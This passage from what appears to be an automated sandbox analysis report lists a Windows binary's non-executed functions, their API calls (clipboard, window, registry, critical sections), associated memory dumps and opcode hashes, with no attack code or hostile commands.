                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7E06DB5901622BB97112B20BE09E7B766CEF927413048525FA24E2240DF38DC11C6B5

                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                          Function 004D9AB0 Relevance: 22.6, APIs: 15, Instructions: 136clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3392129136-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                                          • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                                                                                                                                                                                          Function 0079CDD5 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 20744ecfedf4c28fd76f74ea8c3d8a786a43a3a68d56d5ce4262764e8bcaaa8c
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2516CB1A122099FEF16CF59E9D17AEBBF1FB48310F14806AD405EB250D3789940CF51
                                                                                                                                                                                                                                                                                                                          Function 007A9277 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2716880516.00000000007A9000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a0743dcc37270f94bbdfc13b256ffb0086501d309c9e3f5df53f5aed5376cb7
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F06D79A00200EF8B24DF0AC548E95B7F6FBC6720B6546A5E504DB2A1D3B8ED54CBA0
                                                                                                                                                                                                                                                                                                                          Function 004D7960 Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                                                                                                                                                                                          • API String ID: 0-3677570488
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94
                                                                                                                                                                                                                                                                                                                          Function 004F4A60 Relevance: 43.9, APIs: 22, Strings: 7, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-761530088
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65
                                                                                                                                                                                                                                                                                                                          Function 004D5D20 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 284COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                          • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                                                                                                                                                                                          • API String ID: 3375834691-1928458085
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9
                                                                                                                                                                                                                                                                                                                          Function 004DB4E0 Relevance: 22.7, APIs: 15, Instructions: 180windowCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3087884050-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                                          • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65
                                                                                                                                                                                                                                                                                                                          Function 004CFE40 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 164registryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFE8F
                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFEC1
                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFF52
                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFF84
                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFFF3
                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004D0021
                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004D0043
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                                                                                                                                                                                          • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                                                                                                          • API String ID: 3944000476-502054578
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA
                                                                                                                                                                                                                                                                                                                          Function 004F5FC0 Relevance: 17.8, APIs: 14, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
